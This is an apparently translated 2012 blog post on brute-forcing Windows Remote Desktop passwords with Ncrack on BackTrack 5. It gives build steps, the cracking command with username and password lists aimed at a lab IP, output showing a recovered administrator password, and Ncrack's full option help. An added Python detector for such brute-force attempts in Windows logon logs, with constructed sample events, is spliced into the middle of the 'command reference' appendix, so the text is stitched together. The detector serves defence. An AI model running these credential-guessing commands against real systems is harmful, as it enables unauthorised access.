
Cracking 3389 (RDP) with ncrack on BT5

2012-06-13 10:56:52 / Category: Linux miscellany

First download Ncrack from the official site: http://nmap.org/ncrack/
Ncrack is an open source tool for network authentication cracking
Both Linux and Windows versions are available; usage is as follows:

On Linux (frustratingly, it did not work for me; I got: Warning: File ./ncrack-services exists, but Ncrack is using /usr/local/share/ncrack/ncrack-services for security and consistency reasons. Set NCRACKDIR=. to give priority to files in your local directory (may affect the other data files too).)

1. Install the build dependencies
mickey@pentestbox:~# sudo apt-get install build-essential libssl-dev libssh-dev

2. Download / build / install
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
make install

3. Crack Terminal Services on an English-language Windows system
mickey@pentestbox:~# ncrack -vv -U windows.user -P windows.pwd 192.168.1.107:3389,CL=1 -f
PS: -U specifies the username file; -P specifies the password file.
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-22 06:47 EDT

Discovered credentials on rdp://192.168.1.107:3389 'administrator' 'mickeymouse'
rdp://192.168.1.107:3389 finished.

Discovered credentials for rdp on 192.168.1.107 3389/tcp:
192.168.1.107 3389/tcp rdp: 'administrator' 'mickeymouse'

Ncrack done: 1 service scanned in 51.01 seconds.
Probes sent: 10 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

On Windows:

Download and install the exe from the official site, place the matching dictionary files in the corresponding directory, and run the same command as above. Tested successfully several times on Windows Server 2008; on Server 2003 (default configuration) it did not succeed.
Appendix: command reference:
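From the defender's side, the run above is easy to recognise in the target's Security log: CL=1 means one connection at a time, and 10 probes in 51 seconds is roughly one failed logon every five seconds from a single source, followed by one success once the password is found. The following Python script is an added example (not part of the original post and not Ncrack's code) that applies that pattern to a log export. The flat line layout and its field names (EventID=, LogonType=, TargetUser=, IpAddress=, Status=) are a hypothetical rendering chosen for this example; the event IDs 4625 (failed logon) and 4624 (successful logon), logon type 10 (RemoteInteractive) and 3 (Network, which NLA-protected RDP typically records on failure), and status 0xC000006D (bad username or password) are real Windows values. The sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical flat export format assumed for this example (field names are
# ours, not a Windows export format).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) EventID=(?P<eid>\d+) "
    r"LogonType=(?P<ltype>\d+) TargetUser=(?P<user>\S+) IpAddress=(?P<ip>\S+)"
)

# Constructed sample log (not real telemetry): nine failed logons from one
# source over 40 seconds, one unrelated failure from another host, then a
# successful RDP logon from the first source.
SAMPLE_LOG = """\
2011-05-22 06:47:01 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:06 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:11 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:16 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:20 EventID=4625 LogonType=3 TargetUser=bob IpAddress=192.168.1.77 Status=0xC000006D
2011-05-22 06:47:21 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:26 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:31 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:36 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:41 EventID=4625 LogonType=3 TargetUser=administrator IpAddress=192.168.1.50 Status=0xC000006D
2011-05-22 06:47:52 EventID=4624 LogonType=10 TargetUser=administrator IpAddress=192.168.1.50 Status=0x0
"""


def parse_line(line):
    """Parse one export line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return {
        "ts": datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S"),
        "eid": int(d["eid"]),
        "ltype": int(d["ltype"]),
        "user": d["user"],
        "ip": d["ip"],
    }


def detect_rdp_bruteforce(lines, threshold=5, window_s=60):
    """Return one alert per source IP that produced at least `threshold` failed
    logons (4625) inside any `window_s`-second span, and mark whether a
    successful logon (4624) from that IP followed the burst."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)     # ip -> failure timestamps inside the sliding window
    total = defaultdict(int)        # ip -> all failures seen so far
    users = defaultdict(set)        # ip -> usernames tried
    alerts = {}                     # ip -> alert dict
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["eid"] == 4625:
            total[ip] += 1
            users[ip].add(ev["user"])
            q = recent[ip]
            q.append(ev["ts"])
            # Drop failures that fell out of the window.
            while ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"ip": ip, "first_failure": q[0],
                                           "followed_by_success": False})
                a["last_failure"] = ev["ts"]
                a["failures"] = total[ip]
                a["users"] = sorted(users[ip])
        elif ev["eid"] == 4624 and ip in alerts and ev["ts"] >= alerts[ip]["last_failure"]:
            # A success after a flagged burst is the strongest signal: the guess worked.
            alerts[ip]["followed_by_success"] = True
    return sorted(alerts.values(), key=lambda a: a["first_failure"])


if __name__ == "__main__":
    for a in detect_rdp_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{a['ip']}: {a['failures']} failures on {a['users']} "
              f"between {a['first_failure']:%H:%M:%S} and {a['last_failure']:%H:%M:%S}; "
              f"success afterwards: {a['followed_by_success']}")
```

The threshold of five failures per minute is deliberately low because the post's own run (CL=1, -f) is slow and single-threaded; a detector tuned only for high-rate bursts would miss it. The same numbers are the ones to mirror in an account lockout policy, which is the mitigation that stops this class of guessing outright.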
Ncrack 0.4ALPHA ( http://ncrack.org )
Usage: ncrack [Options] {target and service specification}
TARGET SPECIFICATION:
  Can pass hostnames, IP addresses, networks, etc.
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
  -iX <inputfilename>: Input from Nmap's -oX XML output format
  -iN <inputfilename>: Input from Nmap's -oN Normal output format
  -iL <inputfilename>: Input from list of hosts/networks
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
  --excludefile <exclude_file>: Exclude list from file
SERVICE SPECIFICATION:
  Can pass target specific services in <service>://target (standard) notation or
  using -p which will be applied to all hosts in non-standard notation.
  Service arguments can be specified to be host-specific, type of service-specific
  (-m) or global (-g). Ex: ssh://10.0.0.10,at=10,cl=30 -m ssh:at=50 -g cd=3000
  Ex2: ncrack -p ssh,ftp:3500,25 10.0.0.10 scanme.nmap.org google.com:80,ssl
  -p <service-list>: services will be applied to all non-standard notation hosts
  -m <service>:<options>: options will be applied to all services of this type
  -g <options>: options will be applied to every service globally
  Misc options:
    ssl: enable SSL over this service
    path <name>: used in modules like HTTP ('=' needs escaping if used)
TIMING AND PERFORMANCE:
  Options which take <time> are in seconds, unless you append 'ms'
  (miliseconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m).
  Service-specific options:
    cl (min connection limit): minimum number of concurrent parallel connections
    CL (max connection limit): maximum number of concurrent parallel connections
    at (authentication tries): authentication attempts per connection
    cd (connection delay): delay <time> between each connection initiation
    cr (connection retries): caps number of service connection attempts
    to (time-out): maximum cracking <time> for service, regardless of success so far
  -T<0-5>: Set timing template (higher is faster)
  --connection-limit <number>: threshold for total concurrent connections
AUTHENTICATION:
  -U <filename>: username file
  -P <filename>: password file
  --user <username_list>: comma-separated username list
  --pass <password_list>: comma-separated password list
  --passwords-first: Iterate password list for each username. Default is opposite.
OUTPUT:
  -oN/-oX <file>: Output scan in normal and XML format, respectively, to the given filename.
  -oA <basename>: Output in the two major formats at once
  -v: Increase verbosity level (use twice or more for greater effect)
  -d[level]: Set or increase debugging level (Up to 10 is meaningful)
  --nsock-trace <level>: Set nsock trace level (Valid range: 0 - 10)
  --log-errors: Log errors/warnings to the normal-format output file
  --append-output: Append to rather than clobber specified output files
MISC:
  --resume <file>: Continue previously saved session
  -f: quit cracking service after one found credential
  -6: Enable IPv6 cracking
  -sL or --list: only list hosts and services
  --datadir <dirname>: Specify custom Ncrack data file location
  -V: Print version number
  -h: Print this help summary page.
MODULES:
  FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC
EXAMPLES:
  ncrack -v --user root localhost:22
  ncrack -v -T5 https://192.168.0.1
  ncrack -v -iX ~/nmap.xml -g CL=5,to=1h
SEE THE MAN PAGE (http://nmap.org/ncrack/man.html) FOR MORE OPTIONS AND EXAMPLES
